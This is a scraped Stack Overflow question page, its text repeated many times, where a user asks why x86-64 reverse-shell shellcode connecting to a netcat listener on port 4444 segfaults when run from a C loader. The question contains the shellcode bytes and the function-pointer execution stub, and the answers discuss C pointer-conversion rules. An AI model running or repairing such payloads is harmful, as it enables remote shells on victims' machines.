shellcode working , but no in a custom C program
up vote
-1
down vote
favorite
my payload asm works , but I tried to embed to my own c program it works. conect to my nc port 4444 then brake the conection . I dont why this it happen if I tested this example on my asm executable and it works perfectly , but on my c program not. what can I do ? how can I debug it?
#include <stdio.h>
unsigned char random = "0E249hvzColk1lZ4Vk1eccJM07x2FuitUVsliNPA5FybQn-Ny7DQJ0t-JCvDnm-mZY8YkyOtj6xgN1AUKzcBtr9rRCdGlZCjNnOKGbMzfpQQUampvZsqE0MRDhcvyvpOWzqZG5QJGBuL4-u0MipHq1ioOyNdcWcsRF0zPBd7iI76tTK5CPeDhklfSNQKaw50tsA1lEXDl7mVcvre9b6I-cUR1hYg2oLC6W0zwznvIizbea21OOB9oke5hYdWSSmI181bwvP6IuR20HIu1rGjKgnjHbClcMt9DWBOHBrtxSVUddgparNs5mR3lK3AtY85DN9W2ikX0lOSZbgcB47KC-wSGYRWOuqj1G8ebqUIArlnGk1TBKdwmezfz7RXHsa0EBlFRz60H9lDyQjJb31e78Ff1xXsFEJ5mnkU9rL5NDxPxyOkqxQoO1-6iR62feGLvQdUKfqXF2G0X8NMYqx0UWa78ezsOGsqdnwU5ktwMm2jaPZ5F1G8GKJFYGr7SXz6";
//x31xc0x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x54x5fx99x52x57x54x5exb0x3bx0fx05 64 bits shell
unsigned char shellcode = "x68xacx14x0ax02x66x68x11x5cx66x6ax02x6ax2ax6ax10x6ax29x6ax01x6ax02x5fx5ex48x31xd2x58x0fx05x48x89xc7x5ax58x48x89xe6x0fx05x48x31xf6xb0x21x0fx05x48xffxc6x48x83xfex02x7exf3x48x31xc0x48xbfx2fx2fx62x69x2fx73x68x48x31xf6x56x57x48x89xe7x48x31xd2xb0x3bx0fx05";
int main(void){
((void (*)())shellcode)();
}
./custom
Segmentation fault (core dumped)
c payload shellcode
asked Nov 8 at 4:49
m4st3rRul3z m4st3rRul3z
94
add a comment |
up vote
-1
down vote
favorite
my payload asm works , but I tried to embed to my own c program it works. conect to my nc port 4444 then brake the conection . I dont why this it happen if I tested this example on my asm executable and it works perfectly , but on my c program not. what can I do ? how can I debug it?
#include <stdio.h>
unsigned char random = "0E249hvzColk1lZ4Vk1eccJM07x2FuitUVsliNPA5FybQn-Ny7DQJ0t-JCvDnm-mZY8YkyOtj6xgN1AUKzcBtr9rRCdGlZCjNnOKGbMzfpQQUampvZsqE0MRDhcvyvpOWzqZG5QJGBuL4-u0MipHq1ioOyNdcWcsRF0zPBd7iI76tTK5CPeDhklfSNQKaw50tsA1lEXDl7mVcvre9b6I-cUR1hYg2oLC6W0zwznvIizbea21OOB9oke5hYdWSSmI181bwvP6IuR20HIu1rGjKgnjHbClcMt9DWBOHBrtxSVUddgparNs5mR3lK3AtY85DN9W2ikX0lOSZbgcB47KC-wSGYRWOuqj1G8ebqUIArlnGk1TBKdwmezfz7RXHsa0EBlFRz60H9lDyQjJb31e78Ff1xXsFEJ5mnkU9rL5NDxPxyOkqxQoO1-6iR62feGLvQdUKfqXF2G0X8NMYqx0UWa78ezsOGsqdnwU5ktwMm2jaPZ5F1G8GKJFYGr7SXz6";
//x31xc0x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x54x5fx99x52x57x54x5exb0x3bx0fx05 64 bits shell
unsigned char shellcode = "x68xacx14x0ax02x66x68x11x5cx66x6ax02x6ax2ax6ax10x6ax29x6ax01x6ax02x5fx5ex48x31xd2x58x0fx05x48x89xc7x5ax58x48x89xe6x0fx05x48x31xf6xb0x21x0fx05x48xffxc6x48x83xfex02x7exf3x48x31xc0x48xbfx2fx2fx62x69x2fx73x68x48x31xf6x56x57x48x89xe7x48x31xd2xb0x3bx0fx05";
int main(void){
((void (*)())shellcode)();
}
./custom
Segmentation fault (core dumped)
c payload shellcode
asked Nov 8 at 4:49
m4st3rRul3z m4st3rRul3z
94
I am so not going to run and debug your hellcode.
– Antti Haapala
Nov 8 at 6:25
add a comment |
up vote
-1
down vote
favorite
up vote
-1
down vote
favorite
my payload asm works , but I tried to embed to my own c program it works. conect to my nc port 4444 then brake the conection . I dont why this it happen if I tested this example on my asm executable and it works perfectly , but on my c program not. what can I do ? how can I debug it?
#include <stdio.h>
unsigned char random = "0E249hvzColk1lZ4Vk1eccJM07x2FuitUVsliNPA5FybQn-Ny7DQJ0t-JCvDnm-mZY8YkyOtj6xgN1AUKzcBtr9rRCdGlZCjNnOKGbMzfpQQUampvZsqE0MRDhcvyvpOWzqZG5QJGBuL4-u0MipHq1ioOyNdcWcsRF0zPBd7iI76tTK5CPeDhklfSNQKaw50tsA1lEXDl7mVcvre9b6I-cUR1hYg2oLC6W0zwznvIizbea21OOB9oke5hYdWSSmI181bwvP6IuR20HIu1rGjKgnjHbClcMt9DWBOHBrtxSVUddgparNs5mR3lK3AtY85DN9W2ikX0lOSZbgcB47KC-wSGYRWOuqj1G8ebqUIArlnGk1TBKdwmezfz7RXHsa0EBlFRz60H9lDyQjJb31e78Ff1xXsFEJ5mnkU9rL5NDxPxyOkqxQoO1-6iR62feGLvQdUKfqXF2G0X8NMYqx0UWa78ezsOGsqdnwU5ktwMm2jaPZ5F1G8GKJFYGr7SXz6";
//x31xc0x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x54x5fx99x52x57x54x5exb0x3bx0fx05 64 bits shell
unsigned char shellcode = "x68xacx14x0ax02x66x68x11x5cx66x6ax02x6ax2ax6ax10x6ax29x6ax01x6ax02x5fx5ex48x31xd2x58x0fx05x48x89xc7x5ax58x48x89xe6x0fx05x48x31xf6xb0x21x0fx05x48xffxc6x48x83xfex02x7exf3x48x31xc0x48xbfx2fx2fx62x69x2fx73x68x48x31xf6x56x57x48x89xe7x48x31xd2xb0x3bx0fx05";
int main(void){
((void (*)())shellcode)();
}
./custom
Segmentation fault (core dumped)
c payload shellcode
asked Nov 8 at 4:49
m4st3rRul3z m4st3rRul3z
94
my payload asm works , but I tried to embed to my own c program it works. conect to my nc port 4444 then brake the conection . I dont why this it happen if I tested this example on my asm executable and it works perfectly , but on my c program not. what can I do ? how can I debug it?
#include <stdio.h>
unsigned char random = "0E249hvzColk1lZ4Vk1eccJM07x2FuitUVsliNPA5FybQn-Ny7DQJ0t-JCvDnm-mZY8YkyOtj6xgN1AUKzcBtr9rRCdGlZCjNnOKGbMzfpQQUampvZsqE0MRDhcvyvpOWzqZG5QJGBuL4-u0MipHq1ioOyNdcWcsRF0zPBd7iI76tTK5CPeDhklfSNQKaw50tsA1lEXDl7mVcvre9b6I-cUR1hYg2oLC6W0zwznvIizbea21OOB9oke5hYdWSSmI181bwvP6IuR20HIu1rGjKgnjHbClcMt9DWBOHBrtxSVUddgparNs5mR3lK3AtY85DN9W2ikX0lOSZbgcB47KC-wSGYRWOuqj1G8ebqUIArlnGk1TBKdwmezfz7RXHsa0EBlFRz60H9lDyQjJb31e78Ff1xXsFEJ5mnkU9rL5NDxPxyOkqxQoO1-6iR62feGLvQdUKfqXF2G0X8NMYqx0UWa78ezsOGsqdnwU5ktwMm2jaPZ5F1G8GKJFYGr7SXz6";
//x31xc0x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x54x5fx99x52x57x54x5exb0x3bx0fx05 64 bits shell
unsigned char shellcode = "x68xacx14x0ax02x66x68x11x5cx66x6ax02x6ax2ax6ax10x6ax29x6ax01x6ax02x5fx5ex48x31xd2x58x0fx05x48x89xc7x5ax58x48x89xe6x0fx05x48x31xf6xb0x21x0fx05x48xffxc6x48x83xfex02x7exf3x48x31xc0x48xbfx2fx2fx62x69x2fx73x68x48x31xf6x56x57x48x89xe7x48x31xd2xb0x3bx0fx05";
int main(void){
((void (*)())shellcode)();
}
./custom
Segmentation fault (core dumped)
c payload shellcode
c payload shellcode
asked Nov 8 at 4:49
m4st3rRul3z m4st3rRul3z
94
asked Nov 8 at 4:49
m4st3rRul3z m4st3rRul3z
94
asked Nov 8 at 4:49
m4st3rRul3z m4st3rRul3z
94
asked Nov 8 at 4:49
m4st3rRul3z m4st3rRul3z
94
asked Nov 8 at 4:49
m4st3rRul3z m4st3rRul3z
94
94
I am so not going to run and debug your hellcode.
– Antti Haapala
Nov 8 at 6:25
add a comment |
I am so not going to run and debug your hellcode.
– Antti Haapala
Nov 8 at 6:25
I am so not going to run and debug your hellcode.
– Antti Haapala
Nov 8 at 6:25
I am so not going to run and debug your hellcode.
– Antti Haapala
Nov 8 at 6:25
add a comment |
1 Answer
1
active
oldest
votes
up vote
0
down vote
You are trying to convert an object pointer shellcode to a function pointer in the following statement:
((void (*)())shellcode)();
This can lead to undefined behaviour.
C99 standard states this on the section on function pointers:
Even with an explicit cast, it is invalid to convert a function pointer to an object pointer or a pointer to void, or vice versa.
You can see this when you compile your code with -pedantic-errors option in GCC which gives the following error.
<source>: In function 'main':
<source>:11:6: error: ISO C forbids conversion of object pointer to function pointer type [-Wpedantic]
See live demo here.
answered Nov 8 at 5:04
P.W
8,7432641
how can I fix it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:11
You need to find a compiler which supports this as an extension and use it to compiler your code.
– P.W
Nov 8 at 5:19
how can I fix the main part for it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:30
@P.W that is not an explanation. It should work on GCC as such...
– Antti Haapala
Nov 8 at 6:24
@AnttiHaapala: Yes, GCC supports it. We do not know what compiler OP is using. So in the comments, I asked him to use a compiler that supports this as an extension.
– P.W
Nov 8 at 6:29
|
show 1 more comment
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
up vote
0
down vote
You are trying to convert an object pointer shellcode to a function pointer in the following statement:
((void (*)())shellcode)();
This can lead to undefined behaviour.
C99 standard states this on the section on function pointers:
Even with an explicit cast, it is invalid to convert a function pointer to an object pointer or a pointer to void, or vice versa.
You can see this when you compile your code with -pedantic-errors option in GCC which gives the following error.
<source>: In function 'main':
<source>:11:6: error: ISO C forbids conversion of object pointer to function pointer type [-Wpedantic]
See live demo here.
answered Nov 8 at 5:04
P.W
8,7432641
how can I fix it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:11
You need to find a compiler which supports this as an extension and use it to compiler your code.
– P.W
Nov 8 at 5:19
how can I fix the main part for it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:30
@P.W that is not an explanation. It should work on GCC as such...
– Antti Haapala
Nov 8 at 6:24
@AnttiHaapala: Yes, GCC supports it. We do not know what compiler OP is using. So in the comments, I asked him to use a compiler that supports this as an extension.
– P.W
Nov 8 at 6:29
|
show 1 more comment
up vote
0
down vote
You are trying to convert an object pointer shellcode to a function pointer in the following statement:
((void (*)())shellcode)();
This can lead to undefined behaviour.
C99 standard states this on the section on function pointers:
Even with an explicit cast, it is invalid to convert a function pointer to an object pointer or a pointer to void, or vice versa.
You can see this when you compile your code with -pedantic-errors option in GCC which gives the following error.
<source>: In function 'main':
<source>:11:6: error: ISO C forbids conversion of object pointer to function pointer type [-Wpedantic]
See live demo here.
answered Nov 8 at 5:04
P.W
8,7432641
how can I fix it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:11
You need to find a compiler which supports this as an extension and use it to compiler your code.
– P.W
Nov 8 at 5:19
how can I fix the main part for it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:30
@P.W that is not an explanation. It should work on GCC as such...
– Antti Haapala
Nov 8 at 6:24
@AnttiHaapala: Yes, GCC supports it. We do not know what compiler OP is using. So in the comments, I asked him to use a compiler that supports this as an extension.
– P.W
Nov 8 at 6:29
|
show 1 more comment
up vote
0
down vote
up vote
0
down vote
You are trying to convert an object pointer shellcode to a function pointer in the following statement:
((void (*)())shellcode)();
This can lead to undefined behaviour.
C99 standard states this on the section on function pointers:
Even with an explicit cast, it is invalid to convert a function pointer to an object pointer or a pointer to void, or vice versa.
You can see this when you compile your code with -pedantic-errors option in GCC which gives the following error.
<source>: In function 'main':
<source>:11:6: error: ISO C forbids conversion of object pointer to function pointer type [-Wpedantic]
See live demo here.
answered Nov 8 at 5:04
P.W
8,7432641
You are trying to convert an object pointer shellcode to a function pointer in the following statement:
((void (*)())shellcode)();
This can lead to undefined behaviour.
C99 standard states this on the section on function pointers:
Even with an explicit cast, it is invalid to convert a function pointer to an object pointer or a pointer to void, or vice versa.
You can see this when you compile your code with -pedantic-errors option in GCC which gives the following error.
<source>: In function 'main':
<source>:11:6: error: ISO C forbids conversion of object pointer to function pointer type [-Wpedantic]
See live demo here.
answered Nov 8 at 5:04
P.W
8,7432641
answered Nov 8 at 5:04
P.W
8,7432641
answered Nov 8 at 5:04
P.W
8,7432641
answered Nov 8 at 5:04
P.W
8,7432641
8,7432641
how can I fix it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:11
You need to find a compiler which supports this as an extension and use it to compiler your code.
– P.W
Nov 8 at 5:19
how can I fix the main part for it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:30
@P.W that is not an explanation. It should work on GCC as such...
– Antti Haapala
Nov 8 at 6:24
@AnttiHaapala: Yes, GCC supports it. We do not know what compiler OP is using. So in the comments, I asked him to use a compiler that supports this as an extension.
– P.W
Nov 8 at 6:29
|
show 1 more comment
how can I fix it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:11
You need to find a compiler which supports this as an extension and use it to compiler your code.
– P.W
Nov 8 at 5:19
how can I fix the main part for it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:30
@P.W that is not an explanation. It should work on GCC as such...
– Antti Haapala
Nov 8 at 6:24
@AnttiHaapala: Yes, GCC supports it. We do not know what compiler OP is using. So in the comments, I asked him to use a compiler that supports this as an extension.
– P.W
Nov 8 at 6:29
how can I fix it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:11
how can I fix it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:11
You need to find a compiler which supports this as an extension and use it to compiler your code.
– P.W
Nov 8 at 5:19
You need to find a compiler which supports this as an extension and use it to compiler your code.
– P.W
Nov 8 at 5:19
how can I fix the main part for it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:30
how can I fix the main part for it?
– m4st3rRul3z m4st3rRul3z
Nov 8 at 5:30
@P.W that is not an explanation. It should work on GCC as such...
– Antti Haapala
Nov 8 at 6:24
@P.W that is not an explanation. It should work on GCC as such...
– Antti Haapala
Nov 8 at 6:24
@AnttiHaapala: Yes, GCC supports it. We do not know what compiler OP is using. So in the comments, I asked him to use a compiler that supports this as an extension.
– P.W
Nov 8 at 6:29
@AnttiHaapala: Yes, GCC supports it. We do not know what compiler OP is using. So in the comments, I asked him to use a compiler that supports this as an extension.
– P.W
Nov 8 at 6:29
|
show 1 more comment
Thanks for contributing an answer to Stack Overflow!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Some of your past answers have not been well-received, and you're in danger of being blocked from answering.
Please pay close attention to the following guidance:
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53201709%2fshellcode-working-but-no-in-a-custom-c-program%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
I am so not going to run and debug your hellcode.
– Antti Haapala
Nov 8 at 6:25